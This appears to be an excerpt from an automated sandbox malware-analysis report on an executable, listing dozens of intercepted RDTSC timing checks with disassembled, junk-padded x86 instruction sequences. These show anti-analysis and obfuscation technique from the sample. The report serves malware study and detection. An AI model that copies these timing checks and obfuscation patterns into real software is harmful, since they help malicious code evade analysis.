Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 499085F second address: 49801CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F83ACDAA9F7h 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e jmp 00007F83ACDAA9F2h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 sub esp, 04h 0x0000001a xor ebx, ebx 0x0000001c cmp eax, 00000000h 0x0000001f je 00007F83ACDAAB4Ah 0x00000025 mov dword ptr [esp], 0000000Dh 0x0000002c call 00007F83B07F6D3Ah 0x00000031 mov edi, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F83ACDAA9EFh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49801CC second address: 4980266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c mov edi, eax 0x0000000e mov esi, 3DEA4D8Bh 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F83ACE24F2Eh 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f push esi 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 pushfd 0x00000024 jmp 00007F83ACE24F38h 0x00000029 sub cl, FFFFFFF8h 0x0000002c jmp 00007F83ACE24F2Bh 0x00000031 popfd 0x00000032 popad 0x00000033 sub esp, 2Ch 0x00000036 jmp 00007F83ACE24F36h 0x0000003b xchg eax, ebx 0x0000003c pushad 0x0000003d mov dx, si 0x00000040 mov ah, 07h 0x00000042 popad 0x00000043 push eax 0x00000044 jmp 00007F83ACE24F34h 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F83ACE24F2Ah 0x00000053 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980266 second address: 498026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498026C second address: 4980291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F83ACE24F2Ch 0x00000008 pop esi 0x00000009 jmp 00007F83ACE24F2Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980291 second address: 4980297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49803C6 second address: 49803CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49803CA second address: 49803D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49803D0 second address: 49803E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACE24F33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49803E7 second address: 4980436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ax, C787h 0x0000000e pushfd 0x0000000f jmp 00007F83ACDAA9ECh 0x00000014 sbb esi, 69F80D38h 0x0000001a jmp 00007F83ACDAA9EBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, bx 0x0000002a jmp 00007F83ACDAA9F7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980463 second address: 4980499 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a jmp 00007F83ACE24F2Dh 0x0000000f jg 00007F841DF42F38h 0x00000015 jmp 00007F83ACE24F2Eh 0x0000001a js 00007F83ACE25006h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980499 second address: 498051D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F83ACDAA9F8h 0x00000008 sbb ch, FFFFFFE8h 0x0000000b jmp 00007F83ACDAA9EBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F83ACDAA9F8h 0x00000019 sbb ax, 3048h 0x0000001e jmp 00007F83ACDAA9EBh 0x00000023 popfd 0x00000024 popad 0x00000025 cmp dword ptr [ebp-14h], edi 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F83ACDAA9F4h 0x0000002f adc esi, 314A72A8h 0x00000035 jmp 00007F83ACDAA9EBh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498051D second address: 498057F instructions: 0x00000000 rdtsc 0x00000002 mov bx, D5D8h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007F841DF42E9Bh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F83ACE24F2Dh 0x00000016 or eax, 13D056C6h 0x0000001c jmp 00007F83ACE24F31h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F83ACE24F30h 0x00000028 adc ah, 00000068h 0x0000002b jmp 00007F83ACE24F2Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+08h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a mov dh, 48h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498057F second address: 4980599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980599 second address: 49805E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 movzx esi, dx 0x00000014 popad 0x00000015 push esi 0x00000016 pushad 0x00000017 pushad 0x00000018 call 00007F83ACE24F34h 0x0000001d pop esi 0x0000001e movsx edx, cx 0x00000021 popad 0x00000022 mov edx, eax 0x00000024 popad 0x00000025 mov dword ptr [esp], esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov di, E2F6h 0x0000002f mov bl, 38h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49805E0 second address: 498065F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov eax, 77EE5BE7h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F83ACDAA9F8h 0x00000016 or ax, 8348h 0x0000001b jmp 00007F83ACDAA9EBh 0x00000020 popfd 0x00000021 mov esi, 5F903ABFh 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F83ACDAA9F5h 0x0000002d nop 0x0000002e jmp 00007F83ACDAA9EEh 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F83ACDAA9F7h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498065F second address: 4980665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980665 second address: 498067D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F83ACDAA9EDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498067D second address: 498068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACE24F2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498068D second address: 4980691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980691 second address: 49806A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, ecx 0x0000000e mov eax, 45E0696Bh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49806DE second address: 49806E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49806E2 second address: 49806E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49806E8 second address: 49806F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498008B second address: 498009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 498009E second address: 498010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F83ACDAA9EFh 0x00000009 add ax, 994Eh 0x0000000e jmp 00007F83ACDAA9F9h 0x00000013 popfd 0x00000014 mov si, D957h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F83ACDAA9EFh 0x00000026 and ch, 0000005Eh 0x00000029 jmp 00007F83ACDAA9F9h 0x0000002e popfd 0x0000002f mov bl, ah 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49801AA second address: 49801B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980A7B second address: 4980AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F83ACDAA9F8h 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F83ACDAA9F7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980AB6 second address: 4980AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F83ACE24F38h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980AF1 second address: 4980AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980AF7 second address: 4980B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACE24F2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980B08 second address: 4980B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, 377B7945h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980B2F second address: 4980B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980B35 second address: 4980B6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F841DEB88A8h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F83ACDAA9F0h 0x00000019 and ax, 0408h 0x0000001e jmp 00007F83ACDAA9EBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980B6B second address: 4980B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980B8F second address: 4980B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980B93 second address: 4980BA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980BA6 second address: 4980BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980BAC second address: 4980BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980BEC second address: 4980BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980BF0 second address: 4980BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980BF6 second address: 4980CB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 pushfd 0x00000006 jmp 00007F83ACDAA9F4h 0x0000000b xor ah, FFFFFF88h 0x0000000e jmp 00007F83ACDAA9EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F83ACDAA9F9h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F83ACDAA9F7h 0x00000028 sub ecx, 1C53AF2Eh 0x0000002e jmp 00007F83ACDAA9F9h 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007F83ACDAA9F0h 0x0000003a adc esi, 4BEF64A8h 0x00000040 jmp 00007F83ACDAA9EBh 0x00000045 popfd 0x00000046 popad 0x00000047 mov eax, dword ptr [eax] 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F83ACDAA9F4h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980CB5 second address: 4980CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980CCE second address: 4980CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980CE0 second address: 4980CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980CE6 second address: 4980D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F83ACDAA9F4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4980DDB second address: 4980DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49908AD second address: 49908B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49908B1 second address: 49908B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49908B5 second address: 49908BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49908BB second address: 49908F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F83ACE24F33h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F83ACE24F36h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49908F9 second address: 49908FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49908FD second address: 499091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 499091A second address: 4990978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F83ACDAA9EEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 pushfd 0x00000017 jmp 00007F83ACDAA9F9h 0x0000001c sub ecx, 35EDD526h 0x00000022 jmp 00007F83ACDAA9F1h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990978 second address: 499097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 499097E second address: 4990982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990982 second address: 4990986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990986 second address: 49909A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F83ACDAA9EFh 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49909A7 second address: 49909AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49909AB second address: 49909AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49909AF second address: 49909B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 49909B5 second address: 4990A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4B2Fh 0x00000007 mov ecx, 4A3E6B4Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F83ACDAA9F3h 0x0000001a and cx, 926Eh 0x0000001f jmp 00007F83ACDAA9F9h 0x00000024 popfd 0x00000025 call 00007F83ACDAA9F0h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990A0E second address: 4990AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F841DF228BBh 0x0000000f pushad 0x00000010 mov ax, 19ADh 0x00000014 pushfd 0x00000015 jmp 00007F83ACE24F2Ah 0x0000001a sub cl, 00000048h 0x0000001d jmp 00007F83ACE24F2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 cmp dword ptr [75AF459Ch], 05h 0x0000002b jmp 00007F83ACE24F36h 0x00000030 je 00007F841DF3A958h 0x00000036 jmp 00007F83ACE24F30h 0x0000003b xchg eax, esi 0x0000003c jmp 00007F83ACE24F30h 0x00000041 push eax 0x00000042 pushad 0x00000043 call 00007F83ACE24F31h 0x00000048 pushad 0x00000049 popad 0x0000004a pop eax 0x0000004b popad 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990AAA second address: 4990AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990AAE second address: 4990AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990AB2 second address: 4990AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990AD2 second address: 4990B95 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F83ACE24F39h 0x00000008 sub ecx, 31C9C036h 0x0000000e jmp 00007F83ACE24F31h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F83ACE24F2Eh 0x0000001d and ah, 00000058h 0x00000020 jmp 00007F83ACE24F2Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F83ACE24F38h 0x0000002c sub esi, 358C59B8h 0x00000032 jmp 00007F83ACE24F2Bh 0x00000037 popfd 0x00000038 popad 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c pushad 0x0000003d push esi 0x0000003e pop edx 0x0000003f pushfd 0x00000040 jmp 00007F83ACE24F2Eh 0x00000045 or esi, 5DF71418h 0x0000004b jmp 00007F83ACE24F2Bh 0x00000050 popfd 0x00000051 popad 0x00000052 call 00007F83ACE24F38h 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990B95 second address: 4990BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, 43AC358Eh 0x0000000f mov di, 1C9Ah 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 4990BED second address: 4990C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f movsx edx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E5ED1F second address: 5E5ED32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnc 00007F83ACDAA9E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6ADD5 second address: 5E6ADDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
